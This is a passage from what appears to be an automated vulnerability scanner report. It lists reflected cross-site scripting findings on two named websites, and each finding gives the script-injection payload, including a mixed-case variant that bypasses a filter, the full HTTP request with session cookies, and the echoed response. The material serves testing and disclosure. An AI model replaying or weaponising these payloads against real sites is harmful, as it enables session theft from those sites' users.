X-Pingback: http://thefastertimes.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 31 Jan 2011 22:01:02 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
ut type="hidden" name="redirect_to" value="/socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%207c7fd\"><script>alert(1)</script>11e110c29ff/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%
...[SNIP]...

1.103. http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg [REST URL parameter 8]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://thefastertimes.com
Path:   /socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg

Issue detail

The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ca9a"><script>alert(1)</script>61ce310421e was submitted in the REST URL parameter 8. This input was echoed as 7ca9a\"><script>alert(1)</script>61ce310421e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C7ca9a"><script>alert(1)</script>61ce310421e/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg HTTP/1.1
Host: thefastertimes.com
Proxy-Connection: keep-alive
Referer: http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=eae44889a6aaf1b6e3931692068c6a05; __utmz=57436015.1296504542.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/33; __qca=P0-2030699969-1296504545420; _urtak_ursk=BAh7CToRcl9zZXNzaW9uX2lkMDoMZXhwaXJlc0l1OglUaW1lDfTDIMDAqLoGBjofQG1hcnNoYWxfd2l0aF91dGNfY29lcmNpb25UOgx1c2VyX2lkMDoLcmFuZG9tIiMwMG46MCAyYTEgbzE4SisgMTIwIE1uIDI6MzAzMDA%3D--d202b7b15423357f224e238bd365d95c721c34d6%7C29a20f8a34e3d1dc0bdf48916623bd44; __utma=57436015.2119891732.1296504542.1296504542.1296504542.1; __utmc=57436015; __utmb=57436015.2.10.1296504542

Response

HTTP/1.0 404 Not Found
Vary: Accept-Encoding
Date: Mon, 31 Jan 2011 22:04:19 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.2.9
X-Pingback: http://thefastertimes.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 31 Jan 2011 22:04:19 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
="redirect_to" value="/socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C7ca9a\"><script>alert(1)</script>61ce310421e/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefaster
...[SNIP]...

1.104. http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://thefastertimes.com
Path:   /socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg

Issue detail

The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11c5a"><script>alert(1)</script>c3fd7bce4e6 was submitted in the REST URL parameter 9. This input was echoed as 11c5a\"><script>alert(1)</script>c3fd7bce4e6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:11c5a"><script>alert(1)</script>c3fd7bce4e6/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg HTTP/1.1
Host: thefastertimes.com
Proxy-Connection: keep-alive
Referer: http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=eae44889a6aaf1b6e3931692068c6a05; __utmz=57436015.1296504542.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/33; __qca=P0-2030699969-1296504545420; _urtak_ursk=BAh7CToRcl9zZXNzaW9uX2lkMDoMZXhwaXJlc0l1OglUaW1lDfTDIMDAqLoGBjofQG1hcnNoYWxfd2l0aF91dGNfY29lcmNpb25UOgx1c2VyX2lkMDoLcmFuZG9tIiMwMG46MCAyYTEgbzE4SisgMTIwIE1uIDI6MzAzMDA%3D--d202b7b15423357f224e238bd365d95c721c34d6%7C29a20f8a34e3d1dc0bdf48916623bd44; __utma=57436015.2119891732.1296504542.1296504542.1296504542.1; __utmc=57436015; __utmb=57436015.2.10.1296504542

Response

HTTP/1.0 404 Not Found
Vary: Accept-Encoding
Date: Mon, 31 Jan 2011 22:05:51 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.2.9
X-Pingback: http://thefastertimes.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 31 Jan 2011 22:05:51 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
media30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:11c5a\"><script>alert(1)</script>c3fd7bce4e6/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama
...[SNIP]...

1.105. http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://thefastertimes.com
Path:   /socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33748"><script>alert(1)</script>a961dd91ba7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 33748\"><script>alert(1)</script>a961dd91ba7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg?33748"><script>alert(1)</script>a961dd91ba7=1 HTTP/1.1
Host: thefastertimes.com
Proxy-Connection: keep-alive
Referer: http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=eae44889a6aaf1b6e3931692068c6a05; __utmz=57436015.1296504542.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/33; __qca=P0-2030699969-1296504545420; _urtak_ursk=BAh7CToRcl9zZXNzaW9uX2lkMDoMZXhwaXJlc0l1OglUaW1lDfTDIMDAqLoGBjofQG1hcnNoYWxfd2l0aF91dGNfY29lcmNpb25UOgx1c2VyX2lkMDoLcmFuZG9tIiMwMG46MCAyYTEgbzE4SisgMTIwIE1uIDI6MzAzMDA%3D--d202b7b15423357f224e238bd365d95c721c34d6%7C29a20f8a34e3d1dc0bdf48916623bd44; __utma=57436015.2119891732.1296504542.1296504542.1296504542.1; __utmc=57436015; __utmb=57436015.2.10.1296504542

Response

HTTP/1.0 404 Not Found
Vary: Accept-Encoding
Date: Mon, 31 Jan 2011 21:36:26 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.2.9
X-Pingback: http://thefastertimes.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 31 Jan 2011 21:36:26 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg?33748\"><script>alert(1)</script>a961dd91ba7=1" />
...[SNIP]...

1.106. http://thefastertimes.com/wp-content/plugins/g-lock-double-opt-in-manager/js/glock2.min.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://thefastertimes.com
Path:   /wp-content/plugins/g-lock-double-opt-in-manager/js/glock2.min.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d7f2"><ScRiPt>alert(1)</ScRiPt>5db40f41346 was submitted in the REST URL parameter 1. This input was echoed as 3d7f2\"><ScRiPt>alert(1)</ScRiPt>5db40f41346 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /3d7f2"><ScRiPt>alert(1)</ScRiPt>5db40f41346/plugins/g-lock-double-opt-in-manager/js/glock2.min.js HTTP/1.1
Host: thefastertimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=57436015.1296504542.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/33; PHPSESSID=eae44889a6aaf1b6e3931692068c6a05; __utma=57436015.2119891732.1296504542.1296504542.1296504542.1; _urtak_ursk=BAh7CToRcl9zZXNzaW9uX2lkMDoMZXhwaXJlc0l1OglUaW1lDfTDIMDAqLoGBjofQG1hcnNoYWxfd2l0aF91dGNfY29lcmNpb25UOgx1c2VyX2lkMDoLcmFuZG9tIiMwMDAxMzEwMCA6IDMgTTBhSjpvKzIyMG4gIDIxbjE%3D--412cad7633dbe777e841f2348764ef1fb7404c5d%7C29a20f8a34e3d1dc0bdf48916623bd44; __utmc=57436015; __qca=P0-2030699969-1296504545420; __utmb=57436015.2.10.1296504542;

Response

HTTP/1.0 404 Not Found
Date: Mon, 31 Jan 2011 20:46:31 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.2.9
Vary: Cookie
X-Pingback: http://thefastertimes.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 31 Jan 2011 20:46:13 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
<input type="hidden" name="redirect_to" value="/3d7f2\"><ScRiPt>alert(1)</ScRiPt>5db40f41346/plugins/g-lock-double-opt-in-manager/js/glock2.min.js" />
...[SNIP]...

1.107. http://thefastertimes.com/wp-login.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://thefastertimes.com
Path:   /wp-login.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbac8"><script>alert(1)</script>30cb21dd885 was submitted in the REST URL parameter 1. This input was echoed as fbac8\"><script>alert(1)</script>30cb21dd885 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fbac8"><script>alert(1)</script>30cb21dd885 HTTP/1.1
Host: thefastertimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=57436015.1296504542.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/33; PHPSESSID=eae44889a6aaf1b6e3931692068c6a05; __utma=57436015.2119891732.1296504542.1296504542.1296504542.1; _urtak_ursk=BAh7CToRcl9zZXNzaW9uX2lkMDoMZXhwaXJlc0l1OglUaW1lDfTDIMDAqLoGBjofQG1hcnNoYWxfd2l0aF91dGNfY29lcmNpb25UOgx1c2VyX2lkMDoLcmFuZG9tIiMwMDAxMzEwMCA6IDMgTTBhSjpvKzIyMG4gIDIxbjE%3D--412cad7633dbe777e841f2348764ef1fb7404c5d%7C29a20f8a34e3d1dc0bdf48916623bd44; __utmc=57436015; __qca=P0-2030699969-1296504545420; __utmb=57436015.2.10.1296504542;

Response

HTTP/1.0 404 Not Found
Date: Mon, 31 Jan 2011 21:34:25 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.2.9
Vary: Cookie
X-Pingback: http://thefastertimes.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 31 Jan 2011 21:34:22 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
<input type="hidden" name="redirect_to" value="/fbac8\"><script>alert(1)</script>30cb21dd885" />
...[SNIP]...

1.108. http://thefastertimes.com/xmlrpc.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://thefastertimes.com
Path:   /xmlrpc.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17312"><script>alert(1)</script>06c1b17e735 was submitted in the REST URL parameter 1. This input was echoed as 17312\"><script>alert(1)</script>06c1b17e735 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xmlrpc.php17312"><script>alert(1)</script>06c1b17e735 HTTP/1.1
Host: thefastertimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=57436015.1296504542.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/33; PHPSESSID=eae44889a6aaf1b6e3931692068c6a05; __utma=57436015.2119891732.1296504542.1296504542.1296504542.1; _urtak_ursk=BAh7CToRcl9zZXNzaW9uX2lkMDoMZXhwaXJlc0l1OglUaW1lDfTDIMDAqLoGBjofQG1hcnNoYWxfd2l0aF91dGNfY29lcmNpb25UOgx1c2VyX2lkMDoLcmFuZG9tIiMwMDAxMzEwMCA6IDMgTTBhSjpvKzIyMG4gIDIxbjE%3D--412cad7633dbe777e841f2348764ef1fb7404c5d%7C29a20f8a34e3d1dc0bdf48916623bd44; __utmc=57436015; __qca=P0-2030699969-1296504545420; __utmb=57436015.2.10.1296504542;

Response

HTTP/1.0 404 Not Found
Date: Mon, 31 Jan 2011 21:13:48 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.2.9
X-Pingback: http://thefastertimes.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 31 Jan 2011 21:13:48 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
<input type="hidden" name="redirect_to" value="/xmlrpc.php17312\"><script>alert(1)</script>06c1b17e735" />
...[SNIP]...

1.109. http://whitepapers.scmagazineuk.com/email_this_page.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://whitepapers.scmagazineuk.com
Path:   /email_this_page.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d03b"><script>alert(1)</script>38ca3e6e881 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /email_this_page.php?url=http%3A//whitepapers.scmagazineuk.com/content1/4d03b"><script>alert(1)</script>38ca3e6e8811136 HTTP/1.1
Host: whitepapers.scmagazineuk.com
Proxy-Connection: keep-alive
Referer: http://whitepapers.scmagazineuk.com/content11136
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_chn_cvp%3D%255B%255B%2527direct%252520load%2527%252C%25271296491520239%2527%255D%255D%7C1454257920239%3B%20s_key_cvp%3D%255B%255B%2527n/a%2527%252C%25271296491520241%2527%255D%255D%7C1454257920241%3B; __qca=P0-1355715055-1296491544254; __utmz=140824240.1296491546.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=v1dnuvd3enfpm1v8f1nrrifeg0; d13795d30c26c1f7270bfa31f0d2069c=505085e11891041f927d712ba3211529; __utmz=190090989.1296493450.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=140824240.2091645457.1296491523.1296491523.1296493455.2; __utmc=140824240; __utmb=140824240.1.10.1296493455; s_sess=%20s_camp_dedupe%3DDirect%2520Loadn/a%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utma=190090989.1492737905.1296493450.1296493450.1296493450.1; __utmc=190090989; __utmb=190090989.5.10.1296493450

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:12:01 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.16
Content-Length: 4706
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><title><
...[SNIP]...
<input type="hidden" name="url" value="http://whitepapers.scmagazineuk.com/content1/4d03b"><script>alert(1)</script>38ca3e6e8811136">
...[SNIP]...

1.110. http://whitepapers.scmagazineuk.com/email_this_page.php [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://whitepapers.scmagazineuk.com
Path:   /email_this_page.php

Issue detail

The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 773d9"><script>alert(1)</script>c4735f62d83 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /email_this_page.php?url=http%3A//whitepapers.scmagazineuk.com/content11136773d9"><script>alert(1)</script>c4735f62d83 HTTP/1.1
Host: whitepapers.scmagazineuk.com
Proxy-Connection: keep-alive
Referer: http://whitepapers.scmagazineuk.com/content11136
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_chn_cvp%3D%255B%255B%2527direct%252520load%2527%252C%25271296491520239%2527%255D%255D%7C1454257920239%3B%20s_key_cvp%3D%255B%255B%2527n/a%2527%252C%25271296491520241%2527%255D%255D%7C1454257920241%3B; __qca=P0-1355715055-1296491544254; __utmz=140824240.1296491546.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=v1dnuvd3enfpm1v8f1nrrifeg0; d13795d30c26c1f7270bfa31f0d2069c=505085e11891041f927d712ba3211529; __utmz=190090989.1296493450.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=140824240.2091645457.1296491523.1296491523.1296493455.2; __utmc=140824240; __utmb=140824240.1.10.1296493455; s_sess=%20s_camp_dedupe%3DDirect%2520Loadn/a%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utma=190090989.1492737905.1296493450.1296493450.1296493450.1; __utmc=190090989; __utmb=190090989.5.10.1296493450

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:12:00 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.16
